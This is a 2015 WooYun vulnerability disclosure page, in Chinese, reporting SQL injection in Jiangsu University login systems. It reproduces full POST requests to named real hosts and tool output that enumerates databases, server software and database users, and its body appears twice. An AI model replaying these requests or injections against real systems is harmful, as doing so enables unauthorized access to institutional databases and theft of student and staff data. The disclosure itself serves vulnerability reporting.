当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133669

漏洞标题:教育系统安全之江苏大学post注射大礼包(9处系统post注入/涉及50+裤/9台服务器/大量信息)

相关厂商:江苏大学

漏洞作者: 牛 小 帅

提交时间:2015-08-12 18:17

修复时间:2015-08-17 18:18

公开时间:2015-08-17 18:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-12: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

江苏大学

详细说明:

1.9处管理系统都可以post注入,只贴其中两处数据(已全部测试成功,其他的不贴了)

T078@Z9MQZTLT]_791WZ1PF.png


POST /check.asp HTTP/1.1
Host: tyb.mingtongtech.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://tyb.mingtongtech.com/relogin.asp
Cookie: ASPSESSIONIDQCDAQDSR=DINHABABKGIIGKLACFIAFOEM
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
username=1&password=1&type=admin&Submit=%B5%C7%C2%BC


User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bysj.ujs.edu.cn/sy/index.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4905
__VIEWSTATE=%2FwEPDwUKLTI1NTkyMTQ5Mw9kFgICBA9kFg5mDzwrAAkBAA8WBB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCBGQWCGYPZBYCZg8VAwMxNTkm5rGf5aSn5pWZ44CUMjAxNeOAlTQz5Y%2B3IOWFs%2BS6juS4vuWKnjIJMjAxNS82LzI0ZAIBD2QWAmYPFQMDMTY4NuW%2Bt%2Bilv%2BaVsOaOp%2BKAneadr%2BesrOS4ieWxiuaxn%2BiLj%2BecgeWkp%2BWtpueUn%2BW3peeoi%2BiurQkyMDE1LzMvMjZkAgIPZBYCZg8VAwMxNzIq44CQ5rGf5aSn5pWZ44CUMjAxNOOAlTk05Y%2B344CR5YWz5LqO5Li%2B5YqeCjIwMTQvMTIvMjNkAgMPZBYCZg8VAwMxNjk25py65qKw5a2m6Zmi5Luq5Zmo57O75LiO5bel5Lia5Lit5b%2BD6IGU5ZCI57uE57uH5Y%2Bs5byACjIwMTQvMTEvMjRkAgIPPCsACQEADxYEHwAWAB8BAgRkFghmD2QWAmYPFQIDMTY2Juaxn%2BWkp%2BaVmeOAlDIwMTXjgJU0M%2BWPtyDlhbPkuo7kuL7lip4yZAIBD2QWAmYPFQIDMTY3NuesrOS4g%2BWxiuWFqOWbveWkp%2BWtpueUn%2BacuuaisOWIm%2BaWsOiuvuiuoeWkp%2Bi1m%2BS4u%2BmimGQCAg9kFgJmDxUCAzE2NCbjgJDmsZ%2FlpKfmlZnjgJQyMDE144CVIDM1IOWPt%2BOAkeWFs%2BS6jmQCAw9kFgJmDxUCAzE0NyrjgJDmsZ%2FlpKfmlZnjgJQyMDE144CVMzPlj7fjgJHlhbPkuo7lgZrlpb1kAgMPPCsACQEADxYEHwAWAB8BAgRkFghmD2QWAmYPFQIDMTU0KOOAkOaxn%2BWkp%2Bagoe%2B8iDIwMDnvvIkyMTPlj7fjgJHmsZ%2Foi4%2FlpKdkAgEPZBYCZg8VAgMxNTMo44CQ5rGf5aSn5qCh44CUMjAwOeOAlTE5MuWPt%2BOAkeWFs%2BS6juWNsGQCAg9kFgJmDxUCAzE1MirmsZ%2Foi4%2FlpKflrablrabnlJ%2Flrp7pqozlrojliJkoMjAwMuW5tDLmnIhkAgMPZBYCZg8VAgMxNTEo44CQ5rGf6IuP5aSn5qCh77yIMjAwM%2B%2B8iTI5NeWPt%2BOAkeaxn%2BiLj2QCBg88KwAJAQAPFgQfABYAHwECAWQWAmYPZBYCZg8VAhdodHRwOi8vc3l6eC51anMuZWR1LmNuLyTlt6XnqIvorq3nu4PkuK3lv4PvvIjlt6XkuJrkuK3lv4PvvIlkAgcPPCsACQEADxYEHwAWAB8BAg9kFh5mD2QWAmYPFQMAEueJqeeQhuWunumqjOS4reW%2FgxLniannkIblrp7pqozkuK3lv4NkAgEPZBYCZg8VAwAq6K6h566X5py656eR5a2m5LiO6YCa5L%2Bh5bel56iL5a6e6aqM5Lit5b%2BDHuiuoeeul%2BacuuenkeWtpuS4jumAmuS%2FoeW3peeoi2QCAg9kFgJmDxUDACHog73mupDkuI7liqjlipvlt6XnqIvlrp7pqozkuK3lv4Me6IO95rqQ5LiO5Yqo5Yqb5bel56iL5a6e6aqM5LitZAIDD2QWAmYPFQMAJ%2BadkOaWmeenkeWtpuS4juW3peeoi%2BWunumqjOaVmeWtpuS4reW%2Fgx7mnZDmlpnnp5HlrabkuI7lt6XnqIvlrp7pqozmlZlkAgQPZBYCZg8VAwAh6aOf5ZOB5LiO55Sf54mp5bel56iL5a6e6aqM5Lit5b%2BDHumjn%2BWTgeS4jueUn%2BeJqeW3peeoi%2BWunumqjOS4rWQCBQ9kFgJmDxUDAB7ljLvlrabmioDmnK%2Flrp7pqozmlZnlrabkuK3lv4Me5Yy75a2m5oqA5pyv5a6e6aqM5pWZ5a2m5Lit5b%2BDZAIGD2QWAmYPFQMAGOacuuaisOW3peeoi%2BWunumqjOS4reW%2FgxjmnLrmorDlt6XnqIvlrp7pqozkuK3lv4NkAgcPZBYCZg8VAwAk5LiA5rG96ZSh5p%2B05bel56iL5a6e6Le15pWZ6IKy5Lit5b%2BDHuS4gOaxvemUoeaftOW3peeoi%2BWunui3teaVmeiCsmQCCA9kFgJmDxUDAC3msZ%2Foi4%2FlpKflrabnrqHnkIbkuI7liJvkuJrnu7zlkIjlrp7pqozkuK3lv4Me5rGf6IuP5aSn5a2m566h55CG5LiO5Yib5Lia57u8ZAIJD2QWAmYPFQMAOeaxn%2BiLj%2BWkp%2BWtpuKAlOWkp%2BWFqOmbhuWboueUteawlOW3peeoi%2BWunui3teaVmeiCsuS4reW%2Fgx7msZ%2Foi4%2FlpKflrabigJTlpKflhajpm4blm6LnlLVkAgoPZBYCZg8VAwAk55S15bel55S15a2Q5pWZ5a2m5a6e6aqM56S66IyD5Lit5b%2BDHueUteW3peeUteWtkOaVmeWtpuWunumqjOekuuiMg2QCCw9kFgJmDxUDABjljJblrabljJblt6Xlrp7pqozkuK3lv4MY5YyW5a2m5YyW5bel5a6e6aqM5Lit5b%2BDZAIMD2QWAmYPFQMAGOW3peeoi%2BWKm%2BWtpuWunumqjOS4reW%2Fgxjlt6XnqIvlipvlrablrp7pqozkuK3lv4NkAg0PZBYCZg8VAwAe5rWB5L2T5py65qKw5a6e6Le15pWZ6IKy5Lit5b%2BDHua1geS9k%2BacuuaisOWunui3teaVmeiCsuS4reW%2Fg2QCDg9kFgJmDxUDAB7lnJ%2FmnKjlt6XnqIvlrp7ot7XmlZnogrLkuK3lv4Me5Zyf5pyo5bel56iL5a6e6Le15pWZ6IKy5Lit5b%2BDZAIIDzwrAAkBAA8WBB8AFgAfAQIHZBYOZg9kFgJmDxUDUeaxn%2BiLj%2BWkp%2BWtpuiNo%2BiOt%2BesrOWbm%2BWxiuWFqOWbveWkp%2BWtpueUn%2BW3peeoi%2Biuree7g%2Be7vOWQiOiDveWKm%2Bernui1m%2BS4ieetieWllgMxNjEe5rGf6IuP5aSn5a2m6I2j6I6356ys5Zub5bGKLi4uZAIBD2QWAmYPFQNs5rGf6IuP5aSn5a2m5Zyo5rGf6IuP56eR5oqA5aSn5a2m4oCc6aOe5oCd5Y2h5bCU4oCd5pm66IO96L2m56ue6LWb5pqo5LiO5rGf6IuP5aSn5a2m5Y%2BL6LCK6LWb5Lit6I2j6I635L2z57upAzE2MB7msZ%2Foi4%2FlpKflrablnKjmsZ%2Foi4%2Fnp5HmioAuLi5kAgIPZBYCZg8VA3LmsZ%2Foi4%2FlpKflrabpo5%2Flk4HkuI7nlJ%2Fnianlt6XnqIvlrabpmaLlj4LotZvlm6LpmJ%2FlnKjnrKzljYHlm5vlsYrigJzmjJHmiJjmna%2FigJ3msZ%2Foi4%2FnnIHnq57otZvkuK3ojaPojrfkuIDnrYnlpZYDMTYyHuaxn%2BiLj%2BWkp%2BWtpumjn%2BWTgeS4jueUn%2BeJqS4uLmQCAw9kFgJmDxUDLeaxn%2BiLj%2BWkp%2BWtpuaZuuiDveacuuWZqOS6uuavlOi1m%2BiDnOWIqeiQveW5lQMxNjMe5rGf6IuP5aSn5a2m5pm66IO95py65Zmo5Lq6Li4uZAIED2QWAmYPFQNp5rGf6IuP5aSn5a2m6I2j6I6356ys5Lmd5bGK5YWo5Zu95aSn5a2m55Sf4oCc6aOe5oCd5Y2h5bCU5p2v4oCd5pm66IO95rG96L2m56ue6LWb5YWo5Zu95oC75Yaz6LWb5LqM562J5aWWAzE3MR7msZ%2Foi4%2FlpKflrabojaPojrfnrKzkuZ3lsYouLi5kAgUPZBYCZg8VA1LmsZ%2Foi4%2FlpKflrabmiJDlip%2FkuL7lip5TUElFRCAyMDE05Lit5pel6Z%2Bp5pqR5pyf5Yib5paw5bel56iL6K6%2B6K6h5Zu96ZmF5YyW6aG555uuAzE3MBzmsZ%2Foi4%2FlpKflrabmiJDlip%2FkuL7lip5TLi4uZAIGD2QWAmYPFQNS5rGf6IuP5aSn5a2m5oiQ5Yqf5Li%2B5YqeU1BJRUQgMjAxNOS4reaXpemfqeaakeacn%2BWIm%2BaWsOW3peeoi%2BiuvuiuoeWbvemZheWMlumhueebrgMxNjUc5rGf6IuP5aSn5a2m5oiQ5Yqf5Li%2B5YqeUy4uLmQCCQ8QDxYCHgtfIURhdGFCb3VuZGcWAh4Ib25jaGFuZ2UFCU9uQ2hhbmcoKQ8WAgIBAgIWAhAFCeaVmeWKoeWkhGVnEAUM5rGf6IuP5pWZ6IKyBRF3d3cuZWMuanMuZWR1LmNuL2dkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUTTG9naW4xJEltYWdlQnV0dG9uMQUUTG9naW4xJEltYWdlQnV0dG9uMTEvieksAwJjfeVzDLeQWRP1LN3ncQ%3D%3D&__EVENTVALIDATION=%2FwEWCAKtqLvtAQKUvNa1DwL666vdDALk27CmDALk29z9DgLFm%2BajDQK4ovrCAQKo2a%2BsDQl5aHGk5Njisk8kRJlKgnagxt2p&Login1%24UserName=1&Login1%24PassWord=1&Login1%24ImageButton1.x=56&Login1%24ImageButton1.y=17&Link=http%3A%2F%2Fwww.baidu.com


直接上数据库

available databases [12]:
[*] E:\\COMMONLANGUAGESYSTEM\\AAA\\PUTONGHUA.MDF
[*] JSDX_ChuangXin
[*] JSDX_LunWen
[*] JSDX_SY_NEW
[*] lw
[*] master
[*] model
[*] msdb
[*] NJFU_LSTS
[*] Putonghua
[*] ReportServer
[*] tempdb


available databases [1]:
[*] beifen


[17:22:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[17:22:28] [INFO] fetching current user
current user:    'changedu'


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[17:26:37] [INFO] fetching current user
[17:26:37] [INFO] retrieved: tyb
current user:    'tyb'


到此为止

漏洞证明:

1.9处管理系统都可以post注入,只贴其中两处数据(已全部测试成功,其他的不贴了)

T078@Z9MQZTLT]_791WZ1PF.png


POST /check.asp HTTP/1.1
Host: tyb.mingtongtech.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://tyb.mingtongtech.com/relogin.asp
Cookie: ASPSESSIONIDQCDAQDSR=DINHABABKGIIGKLACFIAFOEM
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
username=1&password=1&type=admin&Submit=%B5%C7%C2%BC


User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bysj.ujs.edu.cn/sy/index.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4905
__VIEWSTATE=%2FwEPDwUKLTI1NTkyMTQ5Mw9kFgICBA9kFg5mDzwrAAkBAA8WBB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCBGQWCGYPZBYCZg8VAwMxNTkm5rGf5aSn5pWZ44CUMjAxNeOAlTQz5Y%2B3IOWFs%2BS6juS4vuWKnjIJMjAxNS82LzI0ZAIBD2QWAmYPFQMDMTY4NuW%2Bt%2Bilv%2BaVsOaOp%2BKAneadr%2BesrOS4ieWxiuaxn%2BiLj%2BecgeWkp%2BWtpueUn%2BW3peeoi%2BiurQkyMDE1LzMvMjZkAgIPZBYCZg8VAwMxNzIq44CQ5rGf5aSn5pWZ44CUMjAxNOOAlTk05Y%2B344CR5YWz5LqO5Li%2B5YqeCjIwMTQvMTIvMjNkAgMPZBYCZg8VAwMxNjk25py65qKw5a2m6Zmi5Luq5Zmo57O75LiO5bel5Lia5Lit5b%2BD6IGU5ZCI57uE57uH5Y%2Bs5byACjIwMTQvMTEvMjRkAgIPPCsACQEADxYEHwAWAB8BAgRkFghmD2QWAmYPFQIDMTY2Juaxn%2BWkp%2BaVmeOAlDIwMTXjgJU0M%2BWPtyDlhbPkuo7kuL7lip4yZAIBD2QWAmYPFQIDMTY3NuesrOS4g%2BWxiuWFqOWbveWkp%2BWtpueUn%2BacuuaisOWIm%2BaWsOiuvuiuoeWkp%2Bi1m%2BS4u%2BmimGQCAg9kFgJmDxUCAzE2NCbjgJDmsZ%2FlpKfmlZnjgJQyMDE144CVIDM1IOWPt%2BOAkeWFs%2BS6jmQCAw9kFgJmDxUCAzE0NyrjgJDmsZ%2FlpKfmlZnjgJQyMDE144CVMzPlj7fjgJHlhbPkuo7lgZrlpb1kAgMPPCsACQEADxYEHwAWAB8BAgRkFghmD2QWAmYPFQIDMTU0KOOAkOaxn%2BWkp%2Bagoe%2B8iDIwMDnvvIkyMTPlj7fjgJHmsZ%2Foi4%2FlpKdkAgEPZBYCZg8VAgMxNTMo44CQ5rGf5aSn5qCh44CUMjAwOeOAlTE5MuWPt%2BOAkeWFs%2BS6juWNsGQCAg9kFgJmDxUCAzE1MirmsZ%2Foi4%2FlpKflrablrabnlJ%2Flrp7pqozlrojliJkoMjAwMuW5tDLmnIhkAgMPZBYCZg8VAgMxNTEo44CQ5rGf6IuP5aSn5qCh77yIMjAwM%2B%2B8iTI5NeWPt%2BOAkeaxn%2BiLj2QCBg88KwAJAQAPFgQfABYAHwECAWQWAmYPZBYCZg8VAhdodHRwOi8vc3l6eC51anMuZWR1LmNuLyTlt6XnqIvorq3nu4PkuK3lv4PvvIjlt6XkuJrkuK3lv4PvvIlkAgcPPCsACQEADxYEHwAWAB8BAg9kFh5mD2QWAmYPFQMAEueJqeeQhuWunumqjOS4reW%2FgxLniannkIblrp7pqozkuK3lv4NkAgEPZBYCZg8VAwAq6K6h566X5py656eR5a2m5LiO6YCa5L%2Bh5bel56iL5a6e6aqM5Lit5b%2BDHuiuoeeul%2BacuuenkeWtpuS4jumAmuS%2FoeW3peeoi2QCAg9kFgJmDxUDACHog73mupDkuI7liqjlipvlt6XnqIvlrp7pqozkuK3lv4Me6IO95rqQ5LiO5Yqo5Yqb5bel56iL5a6e6aqM5LitZAIDD2QWAmYPFQMAJ%2BadkOaWmeenkeWtpuS4juW3peeoi%2BWunumqjOaVmeWtpuS4reW%2Fgx7mnZDmlpnnp5HlrabkuI7lt6XnqIvlrp7pqozmlZlkAgQPZBYCZg8VAwAh6aOf5ZOB5LiO55Sf54mp5bel56iL5a6e6aqM5Lit5b%2BDHumjn%2BWTgeS4jueUn%2BeJqeW3peeoi%2BWunumqjOS4rWQCBQ9kFgJmDxUDAB7ljLvlrabmioDmnK%2Flrp7pqozmlZnlrabkuK3lv4Me5Yy75a2m5oqA5pyv5a6e6aqM5pWZ5a2m5Lit5b%2BDZAIGD2QWAmYPFQMAGOacuuaisOW3peeoi%2BWunumqjOS4reW%2FgxjmnLrmorDlt6XnqIvlrp7pqozkuK3lv4NkAgcPZBYCZg8VAwAk5LiA5rG96ZSh5p%2B05bel56iL5a6e6Le15pWZ6IKy5Lit5b%2BDHuS4gOaxvemUoeaftOW3peeoi%2BWunui3teaVmeiCsmQCCA9kFgJmDxUDAC3msZ%2Foi4%2FlpKflrabnrqHnkIbkuI7liJvkuJrnu7zlkIjlrp7pqozkuK3lv4Me5rGf6IuP5aSn5a2m566h55CG5LiO5Yib5Lia57u8ZAIJD2QWAmYPFQMAOeaxn%2BiLj%2BWkp%2BWtpuKAlOWkp%2BWFqOmbhuWboueUteawlOW3peeoi%2BWunui3teaVmeiCsuS4reW%2Fgx7msZ%2Foi4%2FlpKflrabigJTlpKflhajpm4blm6LnlLVkAgoPZBYCZg8VAwAk55S15bel55S15a2Q5pWZ5a2m5a6e6aqM56S66IyD5Lit5b%2BDHueUteW3peeUteWtkOaVmeWtpuWunumqjOekuuiMg2QCCw9kFgJmDxUDABjljJblrabljJblt6Xlrp7pqozkuK3lv4MY5YyW5a2m5YyW5bel5a6e6aqM5Lit5b%2BDZAIMD2QWAmYPFQMAGOW3peeoi%2BWKm%2BWtpuWunumqjOS4reW%2Fgxjlt6XnqIvlipvlrablrp7pqozkuK3lv4NkAg0PZBYCZg8VAwAe5rWB5L2T5py65qKw5a6e6Le15pWZ6IKy5Lit5b%2BDHua1geS9k%2BacuuaisOWunui3teaVmeiCsuS4reW%2Fg2QCDg9kFgJmDxUDAB7lnJ%2FmnKjlt6XnqIvlrp7ot7XmlZnogrLkuK3lv4Me5Zyf5pyo5bel56iL5a6e6Le15pWZ6IKy5Lit5b%2BDZAIIDzwrAAkBAA8WBB8AFgAfAQIHZBYOZg9kFgJmDxUDUeaxn%2BiLj%2BWkp%2BWtpuiNo%2BiOt%2BesrOWbm%2BWxiuWFqOWbveWkp%2BWtpueUn%2BW3peeoi%2Biuree7g%2Be7vOWQiOiDveWKm%2Bernui1m%2BS4ieetieWllgMxNjEe5rGf6IuP5aSn5a2m6I2j6I6356ys5Zub5bGKLi4uZAIBD2QWAmYPFQNs5rGf6IuP5aSn5a2m5Zyo5rGf6IuP56eR5oqA5aSn5a2m4oCc6aOe5oCd5Y2h5bCU4oCd5pm66IO96L2m56ue6LWb5pqo5LiO5rGf6IuP5aSn5a2m5Y%2BL6LCK6LWb5Lit6I2j6I635L2z57upAzE2MB7msZ%2Foi4%2FlpKflrablnKjmsZ%2Foi4%2Fnp5HmioAuLi5kAgIPZBYCZg8VA3LmsZ%2Foi4%2FlpKflrabpo5%2Flk4HkuI7nlJ%2Fnianlt6XnqIvlrabpmaLlj4LotZvlm6LpmJ%2FlnKjnrKzljYHlm5vlsYrigJzmjJHmiJjmna%2FigJ3msZ%2Foi4%2FnnIHnq57otZvkuK3ojaPojrfkuIDnrYnlpZYDMTYyHuaxn%2BiLj%2BWkp%2BWtpumjn%2BWTgeS4jueUn%2BeJqS4uLmQCAw9kFgJmDxUDLeaxn%2BiLj%2BWkp%2BWtpuaZuuiDveacuuWZqOS6uuavlOi1m%2BiDnOWIqeiQveW5lQMxNjMe5rGf6IuP5aSn5a2m5pm66IO95py65Zmo5Lq6Li4uZAIED2QWAmYPFQNp5rGf6IuP5aSn5a2m6I2j6I6356ys5Lmd5bGK5YWo5Zu95aSn5a2m55Sf4oCc6aOe5oCd5Y2h5bCU5p2v4oCd5pm66IO95rG96L2m56ue6LWb5YWo5Zu95oC75Yaz6LWb5LqM562J5aWWAzE3MR7msZ%2Foi4%2FlpKflrabojaPojrfnrKzkuZ3lsYouLi5kAgUPZBYCZg8VA1LmsZ%2Foi4%2FlpKflrabmiJDlip%2FkuL7lip5TUElFRCAyMDE05Lit5pel6Z%2Bp5pqR5pyf5Yib5paw5bel56iL6K6%2B6K6h5Zu96ZmF5YyW6aG555uuAzE3MBzmsZ%2Foi4%2FlpKflrabmiJDlip%2FkuL7lip5TLi4uZAIGD2QWAmYPFQNS5rGf6IuP5aSn5a2m5oiQ5Yqf5Li%2B5YqeU1BJRUQgMjAxNOS4reaXpemfqeaakeacn%2BWIm%2BaWsOW3peeoi%2BiuvuiuoeWbvemZheWMlumhueebrgMxNjUc5rGf6IuP5aSn5a2m5oiQ5Yqf5Li%2B5YqeUy4uLmQCCQ8QDxYCHgtfIURhdGFCb3VuZGcWAh4Ib25jaGFuZ2UFCU9uQ2hhbmcoKQ8WAgIBAgIWAhAFCeaVmeWKoeWkhGVnEAUM5rGf6IuP5pWZ6IKyBRF3d3cuZWMuanMuZWR1LmNuL2dkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUTTG9naW4xJEltYWdlQnV0dG9uMQUUTG9naW4xJEltYWdlQnV0dG9uMTEvieksAwJjfeVzDLeQWRP1LN3ncQ%3D%3D&__EVENTVALIDATION=%2FwEWCAKtqLvtAQKUvNa1DwL666vdDALk27CmDALk29z9DgLFm%2BajDQK4ovrCAQKo2a%2BsDQl5aHGk5Njisk8kRJlKgnagxt2p&Login1%24UserName=1&Login1%24PassWord=1&Login1%24ImageButton1.x=56&Login1%24ImageButton1.y=17&Link=http%3A%2F%2Fwww.baidu.com


直接上数据库

available databases [12]:
[*] E:\\COMMONLANGUAGESYSTEM\\AAA\\PUTONGHUA.MDF
[*] JSDX_ChuangXin
[*] JSDX_LunWen
[*] JSDX_SY_NEW
[*] lw
[*] master
[*] model
[*] msdb
[*] NJFU_LSTS
[*] Putonghua
[*] ReportServer
[*] tempdb


available databases [1]:
[*] beifen


[17:22:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[17:22:28] [INFO] fetching current user
current user:    'changedu'


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[17:26:37] [INFO] fetching current user
[17:26:37] [INFO] retrieved: tyb
current user:    'tyb'


到此为止

修复方案:

waf

版权声明:转载请注明来源 牛 小 帅@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-17 18:18

厂商回复:

最新状态:

暂无

漏洞评价:

评论